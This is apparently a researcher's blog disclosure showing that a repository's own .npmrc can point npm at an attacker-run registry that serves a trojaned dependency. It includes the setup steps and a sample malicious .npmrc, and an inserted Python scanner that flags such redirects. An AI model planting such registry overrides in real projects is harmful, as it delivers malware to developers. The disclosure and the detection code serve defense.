June 5, 2026
Using .npmrc to achieve remote code execution on npm users
Mohammed Dief
What a miserable day to be writing about anything, but here we go again, since this day has been really amazing and I couldn't miss writing a blog post about it.
And yeah, the title you just read means exactly what it says: a .npmrc file can execute system commands on your machine without you even noticing, and here is how it's done.
Swapping the npm registry to turn harmless code into malware:
If you have dealt with npm before, you know that the .npmrc file is responsible for registry configuration and authentication, and that the npm client can be pointed at any custom registry. The main public npm registry isn't your only option; many companies run their own private registry and publish their code there.
That concept is exactly what this exploit relies on. .npmrc is supposed to be a configuration file for your system, but that is where npm's security fails: it can be overridden easily based on the directory you are in. If the directory you are in contains a .npmrc file, npm loads that custom file instead of falling back to the system-wide npm configuration on your machine, which lets a project override those settings.
Now on to the actual exploit. What do we need to craft something like that? Here is the entire setup:
- A custom self-hosted npm registry
- A modified package with the same name as one of the packages listed under "dependencies" in package.json
Building it:
For the custom registry we just need to set up Verdaccio, which you can do easily using its Docker image and following the setup guide; for more information see https://hub.docker.com/r/verdaccio/verdaccio
Then we build a dummy package that we can publish on GitHub or any other code hosting platform, something similar to this:
{
  "name": "dummy-dummy",
  "version": "0.0.0",
  "dependencies": {
    "abbrev": "^1.0.0"
  }
}
Now we need to publish a package called abbrev to our custom npm registry, but containing our code. In this case all we need to do is clone abbrev and add the code we want executed into the functionality we're using; abbrev only has an index.js inside the package, so our code runs the moment abbrev is imported in the application.
Then the last piece: we abuse the fact that npm lets a project override .npmrc, and we ship our own .npmrc with the project:
# .npmrc
registry=http://127.0.0.1:31337/
//127.0.0.1:31337/:_authToken=PROJECT_TOKEN_PLACED
//127.0.0.1:31337/:_auth=YXR0YWNrZXI6YXR0YWNrZXI=
We just need to adjust the IP and authorization tokens in the configuration. npm now points at our own server, and we can serve the user the modified module, where code executes in either of two ways:
- Install scripts in the package
- Execution from the package itself, if the user passed the --ignore-scripts flag when running npm install on the project
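A defender-side check, added here as an example and not part of the original post: before running npm install on a freshly cloned repository, scan it for .npmrc files that redirect the registry or set per-registry credentials, and stop unless the registry host is on an allowlist. The function names, the allowlist and the sample .npmrc (copied from the post above) are my own assumptions.

```python
import os
import re
from urllib.parse import urlparse
# Registry hosts a project may point at (assumption: add your own mirror hosts here).
TRUSTED_REGISTRY_HOSTS = {"registry.npmjs.org"}

# "registry=URL" or "@scope:registry=URL"
REGISTRY_LINE = re.compile(r"^(?:(@[^:\s]+):)?registry\s*=\s*(\S+)$")
# "//host[/path]/:_authToken=..." and the other per-registry credential keys npm reads
CRED_LINE = re.compile(r"^//([^/\s]+)(?:/[^:\s]*)?:(_authToken|_auth|_password|username)\s*=")

def audit_npmrc(text, trusted=TRUSTED_REGISTRY_HOSTS):
    """Return [(line_no, reason), ...] for .npmrc lines that redirect the registry or set credentials."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line[0] in "#;":  # .npmrc comment lines
            continue
        m = REGISTRY_LINE.match(line)
        if m:
            scope, url = m.groups()
            host = (urlparse(url).hostname or "").lower()
            if host not in trusted:
                target = "%s scoped registry" % scope if scope else "default registry"
                findings.append((n, "%s redirected to untrusted host %r" % (target, host or url)))
            continue
        m = CRED_LINE.match(line)
        if m:
            host, key = m.groups()
            findings.append((n, "%s for %s is set by a project-level file" % (key, host)))
    return findings
def audit_repo(root):
    """Walk a checkout (skipping node_modules) and audit every .npmrc; returns {path: findings}."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]
        if ".npmrc" in filenames:
            path = os.path.join(dirpath, ".npmrc")
            with open(path, encoding="utf-8", errors="replace") as fh:
                found = audit_npmrc(fh.read())
            if found:
                report[path] = found
    return report

# Constructed sample: the .npmrc shown in the post, which must be rejected before `npm install` runs.
SAMPLE_NPMRC = """# .npmrc
registry=http://127.0.0.1:31337/
//127.0.0.1:31337/:_authToken=PROJECT_TOKEN_PLACED
//127.0.0.1:31337/:_auth=YXR0YWNrZXI6YXR0YWNrZXI=
"""
```

Running audit_repo on a checkout and refusing to install when it returns any findings catches this override regardless of whether --ignore-scripts is used, since the redirect happens before any package is fetched.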
TL;DR
Don't use npm install on any GitHub repository; only use it on your own projects that you wrote. Microsoft doesn't care enough to protect you, and the --ignore-scripts flag isn't enough to protect you and doesn't protect you: any repository on GitHub can override your configuration and force you to download modified packages that contain malware. If you can use anything other than npm, that's a much safer option for you.
Timeline:
- May 16, 2026 — Report submitted to Microsoft through their GitHub bug bounty program on HackerOne
- June 5, 2026 — GitHub responded that this is an intentional design decision and is working as expected
- June 5, 2026 — I notified them that I'm disclosing this to the public through my blog to make people aware of such a thing
Stay safe